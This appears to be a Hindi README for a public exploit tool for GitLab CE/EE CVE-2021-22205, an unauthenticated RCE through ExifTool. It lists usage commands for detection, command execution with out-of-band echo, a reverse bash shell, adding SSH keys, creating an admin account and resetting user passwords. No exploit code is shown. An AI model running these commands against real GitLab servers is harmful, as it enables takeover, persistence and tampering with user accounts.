
ExifTool का उपयोग करके GitLab CE/EE प्री-ऑथ RCE
GitLab CE/EE प्रीऑथ RCE ExifTool का उपयोग करके
यह परियोजना केवल सीखने के लिए है, यदि किसी के अधिकारों का उल्लंघन हुआ है, तो कृपया मुझसे संपर्क करें ताकि मैं परियोजना को हटा सकूं, और अंत में इसका गैरकानूनी उपयोग न करें यदि आप इस उपकरण का उपयोग करने की प्रक्रिया में कोई गैरकानूनी व्यवहार करते हैं, तो आप सभी परिणाम स्वयं वहन करेंगे। इस उपकरण के सभी डेवलपर्स और सभी योगदानकर्ता किसी भी कानूनी और संयुक्त देयता का वहन नहीं करते हैं।
GitLab CE/EE में एक मुद्दा पाया गया है जो संस्करण 11.9 से शुरू होने वाले सभी संस्करणों को प्रभावित करता है। GitLab एक फ़ाइल पार्सर को दी गई इमेज फ़ाइलों का सही ढंग से मान्य नहीं कर रहा था, जिसके परिणामस्वरूप एक रिमोट कमांड निष्पादन हुआ।
प्रभावित संस्करण:
🐚 ››› python CVE-2021-22205.py
░░░░▐▐░░░ CVE-2021-22205
▐ ░░░░░▄██▄▄ GitLab CE/EE Unauthenticated RCE using ExifTool
▀▀██████▀░░ Affecting all versions starting from 11.9
░░▐▐░░▐▐░░ security.humanativaspa.it/gitlab-ce-cve-2021-22205-in-the-wild
▒▒▒▐▐▒▒▐▐▒ github.com/inspiringz/CVE-2021-22205
Usage:
python3 CVE-2021-22205.py -u site_url -m detect # gitlab version & vuln detect
python3 CVE-2021-22205.py -u site_url -m rce1 'id' # rce (echo via requestbin oob)
python3 CVE-2021-22205.py -u site_url -m rce2 'id' # rce (echo via write file) *
python3 CVE-2021-22205.py -u site_url -m rev ip port # reverse bash shell
python3 CVE-2021-22205.py -u site_url -m ssh git/root # append ssh authorized_keys
python3 CVE-2021-22205.py -u site_url -m add user pass # add manager account *
python3 CVE-2021-22205.py -u site_url -m mod user # modify specified user's password => P4ss@GitLab
python3 CVE-2021-22205.py -u site_url -m rec user # restore specified user's original password
site_url पैरामीटर प्रारूप: http[s]://<domain|ip>[:port]/, जैसे: https://example.com:9000/* द्वारा चिह्नित विधियाँ (rce2, add) अस्थिर हैं, काम नहीं कर सकती हैं :(पता लगाना:

RCE (RequestBin OOB के माध्यम से इको):

रिवर्स बैश शेल:

authorized_keys में SSH कुंजी जोड़ें:

GitLab उपयोगकर्ता पासवर्ड संशोधन और पुनर्स्थापना:
